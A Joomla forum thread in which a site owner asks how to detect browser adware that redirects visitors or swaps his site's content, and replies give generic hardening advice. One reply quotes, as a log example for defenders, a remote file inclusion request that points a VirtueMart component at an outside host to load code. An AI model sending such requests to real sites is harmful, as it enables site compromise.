Malware/Adware/Spyware Browser Redirects and Content Injects
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
Malware/Adware/Spyware Browser Redirects and Content Injects
Hi,
What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?
We have found PC's in the past that redirect our site to a competitors using the browser and have also found content such as contact details and phone numbers being replaced by competitors.
Any information to help determine this fact would be greatly appreciated. Most often this form of marketing goes by without the site admins detection since it's not server side.
Thanks
Derek
What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?
We have found PC's in the past that redirect our site to a competitors using the browser and have also found content such as contact details and phone numbers being replaced by competitors.
Any information to help determine this fact would be greatly appreciated. Most often this form of marketing goes by without the site admins detection since it's not server side.
Thanks
Derek
-
- Joomla! Enthusiast
- Posts: 166
- Joined: Fri Sep 16, 2005 9:59 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
is it a Joomla based site?
Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.
oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.
Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.
oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
GarfieldLeChat wrote:is it a Joomla based site?
Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.
oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.
It's not server side related, it's the users browser with malicious adware/spyware installed.. I'm asking if anyone knows of a way to test for this kind activity.
Thank you for the feedback though.
-
- Joomla! Enthusiast
- Posts: 166
- Joined: Fri Sep 16, 2005 9:59 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
sorry still don't get what you're driving at this is a joomla help and community forum.ledneonflex wrote:GarfieldLeChat wrote:is it a Joomla based site?
Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.
oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.
It's not server side related, it's the users browser with malicious adware/spyware installed.. I'm asking if anyone knows of a way to test for this kind activity.
Thank you for the feedback though.
Are you asking is it possible to hijack a brower via malicious code in which case the answers yes. If you are asking if it's possible to tell which browsers come to your site using malcious code then possbily, but you'd need to pay someone to do it. and it would entirely depend on what you were looking for v's the cost of having something bespoke programed.
But this isn't really what these forums are for unless it's joomla related.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
GarfieldLeChat wrote:sorry still don't get what you're driving at this is a joomla help and community forum.ledneonflex wrote:GarfieldLeChat wrote:is it a Joomla based site?
Pay a security professional is the answer. some one who will diagnose the problem and fix it and harden up your site secutiry.
oh and I'd pay for some training of your sites admins too as they clearly don't know enough unless this is a virus/trojan related problem in which case you have to have been corportately significant enough to be able to afford security professionals to resolve this.
It's not server side related, it's the users browser with malicious adware/spyware installed.. I'm asking if anyone knows of a way to test for this kind activity.
Thank you for the feedback though.
Are you asking is it possible to hijack a brower via malicious code in which case the answers yes. If you are asking if it's possible to tell which browsers come to your site using malcious code then possbily, but you'd need to pay someone to do it. and it would entirely depend on what you were looking for v's the cost of having something bespoke programed.
But this isn't really what these forums are for unless it's joomla related.
I understand this. I'm asking if anyone knows of any tools that can test if adware/malware/spyware etc.. is targeting your site weather it's Joomla or not. Reason I ask in this forum is that the knowledge here is greater than most other forum and more subscribers.
Thank you for the feedback!
-
- Joomla! Guru
- Posts: 577
- Joined: Wed Aug 05, 2009 1:42 pm
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Greetings:
* Do make sure you've followed the security check list for your joomla installation.
* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.
* Do review your web site logs.
In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.
An example of what you might see for an injection is as follows:
"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"
* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not fool proof, and your provider may have to go through some fine tuning to remove false positives.
Thank you.
* Do make sure you've followed the security check list for your joomla installation.
* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.
* Do review your web site logs.
In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.
An example of what you might see for an injection is as follows:
"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"
* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not fool proof, and your provider may have to go through some fine tuning to remove false positives.
Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
-
- Joomla! Enthusiast
- Posts: 166
- Joined: Fri Sep 16, 2005 9:59 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
see all of this is generic advice which isn't actually what they appear to be asking which seems to be if I've got this right can a site owner tell which infected browsers from a machine or set of machines are visiting their site...dynamicnet wrote:Greetings:
* Do make sure you've followed the security check list for your joomla installation.
* Make sure your Joomla is up to date; do subscribe to the Joomla security newsletter for new releases based on security updates.
* Do review your web site logs.
In the past few years, most hacks are based on web site injection attacks where the attacker alters the URL (web page / web site address) to include code to inject malware or otherwise test if a site can be compromised.
An example of what you might see for an injection is as follows:
"GET /index.php?option=com_content&task=view&id=572&Itemid=84//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.1" 500 3560 "-" "libwww-perl/5.805" SnXJG0YmP6kAAEcEHMI "-"
* Do ask your hosting provider to use mod_security from http://www.modsecurity.org/ as that can help reduce the number of injections that get through; it is not fool proof, and your provider may have to go through some fine tuning to remove false positives.
Thank you.
And the answer is specailist bespoke programming not generalised advice i'm afraid.
If your site is being hit with big old attacks focused from a particlar source or sources then it's unlikely that the browser the user is using will affect your machine unless it's being used to directly launch attacks as part of a wider campagin (ie zombie machine). you'll then get an ip address in your log files of that machine and in effect a browser code however you'd be hard pressed to tell which is which without some kind of interpretation and even hard pressed to prove that a user going to your site with malicious code in their browser was doing so knowingly... proving intent will be the downfall...
-
- Joomla! Guru
- Posts: 577
- Joined: Wed Aug 05, 2009 1:42 pm
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Greetings:
I believe my answer dealt specifically with "What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?" which is to review the web site logs and that will tell if attacks are incoming.
It is possible I misunderstood the question, and then the answer, of course, would be different.
Thank you.
I believe my answer dealt specifically with "What is the best way to determine if your website is a target of malware/adware redirects or website content injections via browser?" which is to review the web site logs and that will tell if attacks are incoming.
It is possible I misunderstood the question, and then the answer, of course, would be different.
Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
-
- Joomla! Guru
- Posts: 577
- Joined: Wed Aug 05, 2009 1:42 pm
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Greetings:
If you are not on the current version, then you are vulnerable.
Thank you.
If you are not on the current version, then you are vulnerable.
Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
-
- Joomla! Apprentice
- Posts: 19
- Joined: Fri Jan 26, 2007 4:08 am
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Hi.. Yah it's slightly out of date.. we are in the process of upgrading to 1.5.. template is done and revised. Just porting over content and cleaning up the old site and making navigation much better as the old site is horrible.
Should be done soon. Is 1.5 vulnerable to xss? Anyone hear of any issues?
Thanks for all the feedback on this issue. Joomla forums are and always have been my favorite source to information regarding almost anything web related.
Should be done soon. Is 1.5 vulnerable to xss? Anyone hear of any issues?
Thanks for all the feedback on this issue. Joomla forums are and always have been my favorite source to information regarding almost anything web related.
-
- Joomla! Guru
- Posts: 577
- Joined: Wed Aug 05, 2009 1:42 pm
Re: Malware/Adware/Spyware Browser Redirects and Content Injects
Greetings:
The latest release is clean for XSS attacks as far as I know... but if your security administrator installs mod_security on the server that will help as well.
Thank you.
The latest release is clean for XSS attacks as far as I know... but if your security administrator installs mod_security on the server that will help as well.
Thank you.
Peter M. Abraham
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.
http://www.dynamicnet.net/ - Dynamic Net, Inc. - in business since June 1995; a PCI Compliant, managed hosting provider.